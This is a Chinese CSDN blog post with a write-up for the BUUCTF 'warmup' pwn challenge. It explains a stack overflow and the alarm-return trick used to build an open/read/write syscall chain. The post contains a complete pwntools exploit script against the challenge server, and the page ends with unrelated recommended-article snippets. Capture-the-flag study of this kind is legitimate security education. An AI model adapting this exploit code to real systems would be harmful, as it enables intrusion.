warmup

最新推荐文章于 2023-10-03 22:16:24 发布
最新推荐文章于 2023-10-03 22:16:24 发布
阅读量502 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/123733182
版权

warmup

查看保护
在这里插入图片描述
在这里插入图片描述
程序很少,保护开的也少,栈溢出漏洞。 正常rop明显是不行的,这个程序不依靠glibc,gadget构造不出来system这一类的系统调用。这里有个姿势(alarm函数)参考了alarm函数有一个特性,如果多次调用alarm,那么alarm就会返回前一个alarm开始到现在,还剩下多长时间 ha1vk
这里有write read
在这里插入图片描述
在这里插入图片描述
想要使用orw还差一个open,根据上面的alarm特性可以构造出sleep(5)使得0xa - 5 = 5成功将5写进eax。就可以调用open这个系统调用了。可以先将/flag这个字符串写入data_addr
open(data_addr, 0)
read(3, data_addr, 0x30)
write(0, data_addr, 0x30)
构造上面这三个即可拿到flag。

from pwn import *
from time import sleep
context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 28957)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

read_addr = 0x804811D
vuln_addr = 0x804815A
write_addr = 0x8048135
data_addr = 0x80491BC

p1 = b'a' * (0x20) + p32(read_addr) + p32(vuln_addr) + p32(0) + p32(data_addr) + p32(0x10)
r.sendafter('Welcome to 0CTF 2016!', p1)

r.send(b'/flag'.ljust(0x10, b'\x00'))
sleep(5)

alarm_addr = 0x804810D
syscall = 0x804813a

#open
p2 = b'a' * 0x20 + p32(alarm_addr) + p32(syscall) + p32(vuln_addr) + p32(data_addr) + p32(0)
r.send(p2)

#read
p3 = b'a' * 0x20 + p32(read_addr) + p32(vuln_addr) + p32(3) + p32(data_addr) + p32(0x40)
r.send(p3)

#write
p4 = b'a' * 0x20 + p32(write_addr) + p32(0) + p32(0) + p32(data_addr) + p32(0x40)
r.send(p4)

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
目标检测的Tricks | 【Trick5】学习率调优方法——warmup
Clichong
04-17 3100
如有错误,恳请指出。 文章目录1. warmup理论概要2. warmup实现代码 1. warmup理论概要 warmup定义: 在模型训练之初选用较小的学习率,训练一段时间之后(如:10epoches或10000steps)使用预设的学习率进行训练。 warmup作用: 因为模型的weights是随机初始化的,可以理解为训练之初模型对数据的“理解程度”为0(即:没有任何先验知识),在第一个epoches中,每个batch的数据对模型来说都是新的,模型会根据输入的数据进行快速调参,此时如果采用较大的.
西门子PLC S7-1200与RS485(MODBUS RTU)协议工业高频RFID读写器握手联机与应用操作说明
热门推荐
华翔天诚科技
11-18 3万+
本文为了更清晰展现,RS485(MODBUS RTU)协议工业高频RFID读写器与西门子PLC S7-1200握手联机与应用操作,特使用了工业RFID读写器CK-LR08-A01作为案例工具。 一、工具准备 1、软件:博图v14 2、PLC:西门子S7-1200 3、读写设备:CK-LR08-A01(RS485(MODBUS RTU)协议)
SCL语言学习
最新发布
weixin_65752158的博客
10-03 662
MB_CLIENT通讯REQ是否发送通讯请求,1是’发送,0是不发DISCONNECT是可以控制MODbus服务器建立和终止连接 0是建立 1是不建立连接。MB_MODE选择MODbus的模式 0读1写2读写。MB_DATA_ADDR是每个区间的长度 现在我们以0读 模式里面的40001~49999为例MB_DATA_LEN就是发送和接受能容纳多少长度的地址。注意数组的长度一定要大于等于这里的长度。MB_DATA_LEN是根据MB_DATA_ADDR这个区间的长度来决定的 这个区间的长度。
STM32读写24c02总结
Lawrence_121
10-25 8111
       这两天学习STM32的IIC,实现读写24c02的数据,对IIC不是那么的陌生,在这里,将这两天的学习的流程总结下,整理整理自己的思路。 简洁         IIC是一种通信协议,通信方式相对比较简单,主要有两条线,SDA,SCL。SDA是数据总线,上面走命令和数据,而SCL只是一条时钟线,其保证数据按照时钟节拍来进行传输。IIC上面可以外挂很多的器件,每一个器件对应者不同的地...
S7-1200PLC Modbus通信踩坑记录
weixin_44226356的博客
11-08 9547
照着网上教程做了还是失败的,建议来看
再说指针
自由理想的足迹
08-12 1484
指令=地址值+数据值。指针是一个指向数据的地址编号,且是它在的地址上的数据值。所以指针能很好的对应指令,可以做地址运算,也可以取得地址上的数据值。 实际编程中必须明确的概念: 1.*,&声明都是地址;但表达式中*是取得addr上的Data,&是取得DataAddr. 2.指针处理字符串特性,指针可以指向一个字符串或者指针数组存放一列数组. 动态表现,故二维的指针数组就可以
TensorFlow Serving API设置warmup
01-07
运行后附代码文件生成tf_serving_warmup_requests文件; 置其于模型保存文件夹内的assets.extra文件夹下; 重启docker API即可,可观察到屏幕输出显示warmp启动成功; 保存模型的文件结构于是乎成为: . ├── ...
pytorch-gradual-warmup-lr:PyTorch的逐步预热学习速率调度程序
02-05
$ pip install git+https://github.com/ildoonet/pytorch-gradual-warmup-lr.git 用法 请参阅文件。 import torch from torch . optim . lr_scheduler import StepLR , ExponentialLR from torch . optim . sgd ...
WarmUp
03-26
在IT行业中,尤其是在Web开发领域,"WarmUp"通常指的是预热或准备阶段,这可能涉及到服务器、应用程序或特定功能的初始化。在这个场景下,"WarmUp"可能是指优化CSS(Cascading Style Sheets)性能的过程,确保网页...
PyPI 官网下载 | warmup_scheduler-0.3.tar.gz
01-30
标题提到的"PyPI 官网下载 | warmup_scheduler-0.3.tar.gz"是指从PyPI网站上下载的一个名为`warmup_scheduler`的Python库的0.3版本的压缩包文件。这个文件通常包含了库的所有源代码、文档和其他必要的资源,以便在...
Modbus 指令
weixin_30562507的博客
05-10 4998
本节内容: 一、S7-1200作为Modbus RTU 主站 二、S7-1200作为Modbus RTU 从站 三、S7-1200作为Modbus RTU 主站 S7-1200作为Modbus RTU 主站 S7-1200 支持Modbus RTU通信模式的模块可作为Modbus RTU主站。以下以 CPU1215C DC/DC/DC和CM1241 RS485 模块为...
Modbus_RTU的通讯方式
weixin_61398412的博客
11-14 4667
Modbus_RTU的通讯方式 RTU 半双工通讯方式 本次使用的是 CPU:1215C DC/DC /RLY 通信模块:CM1241(RS232/RS485)硬件标识符:269(如图 1) 图 1 通信对象是ZNZS2 转速表。首先我们要收集到该转速表的波特率(9600)、功能码(03:保持型寄存器 40001)、地址(3)等信息。 创建通信指令 介绍 RTU通讯有两种通信指令:Modbus(RTU)是新版本,里面的内容更多。Modbus是老版本,本次我们就是用的该版本。(.
S7-1200PLC 与温控仪表Modbus RTU通信
weixin_43922025的博客
03-08 2万+
硬件:cpu 1214C 目的:通过Modbus RTU协议,实现对温控仪表的控制 软件:Portal V14SP1
data=*(vu32*)addr;的理解?
qq_42955211的博客
12-12 3893
首先addr是一个32位的整形数据(比如是0x80040000),代表的是一个地址(地址一般都是32位的),(VU32*)就是把这个整数强制转换成一个指针(这个指针还是32位的,只不过它指向的数据是32位的),这个指针指向的地址里面存了一个类型为vu32的变量x,(vu32)addr就是把这个x赋值给data。 再来看另一个例子(怎么样通过寄存器的地址来操作寄存器,就是给寄存器赋值,下面这句话就可以操作寄存器): 很多时候我们会看到下面的宏定义 #define MEM_ADDR(addr)
*(字符型 *)addr=data;
hduxyc的专栏
05-18 1036
今天在调试NAND FLASH代码的时候,对映射地址赋值的时候,碰到指针的问题,脑子又不清醒。例:  *(unsigned char *)0x70000000=0x90;我起初还以为是什么指针的指针。后来根据别人代码和自己的理解,脑子清醒点了,这个问题以前碰到过。这句话的意思,先将地址0x70000000存取的数据的对齐方式设为unsigned char型(即8位对齐)然后对地址为0x70000000写入数据0x90
异步FIFO设计详解
yh13572438258的博客
12-10 8104
一、FIFO介绍 FIFO存储器概念介绍_的博客-CSDN博客 二、FIFO的“空”/“满”检测 FIFO设计的关键:产生可靠的FIFO读写指针和生成FIFO“空”/“满”状态标志。 当读写指针相等时,表明FIFO为空,这种情况发生在复位操作时,或者当读指针读出FIFO中最后一个字后,追赶上了写指针时,如下图所示: 当读写指针再次相等时,表明FIFO为满,这种情况发生在,当写指针转了一圈,折回来(wrapped around)又追上了读指针,如下图: 为了区分到底是满状态还是空.
[编译环境][gas]addr32和data32指令
火云的专栏
03-03 1570
GAS中的addr32和data32指令
data=*(vu16*)addr;的理解?
weixin_30715523的博客
07-20 2166
首先addr是一个32位的整形数据(比如是0x80040000),代表的是一个地址(地址一般都是32位的),(VU16*)就是把这个整数强制转换成一个指针(这个指针还是32位的,只不过它指向的数据是16位的),这个指针指向的地址里面存了一个类型为vu16的变量x,*(vu16*)addr就是把这个x赋值给data。 再来看另一个例子(怎么样通过寄存器的地址来操作寄存器,就是给寄存器赋...
buuctf warmup
doudoudedi
01-28 568
函数很少我们需要控制寄存器的值来执行内核调用(int 80) 思路 先将字符串/bin/sh写入程序32位的程序用栈传递参数所以我们有充足的空间进行ROP然后跳回程序开始然后将再次读入/bin/sh然后控制好寄存器的值即打开execve的系统调用(这里函数最后的ret会使栈向上提了4个byte所以寄存器控制好了)~~ exp: #!/usr/bin/python2 from pwn import ...
pytorch warmup
07-27
PyTorch的warmup是指在训练神经网络时,初始学习率较小,然后逐渐增加到设定的学习率。这个过程可以帮助网络更好地收敛并提高训练效果。在PyTorch中,可以使用pytorch-gradual-warmup-lr库来实现warmup功能。这个库...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值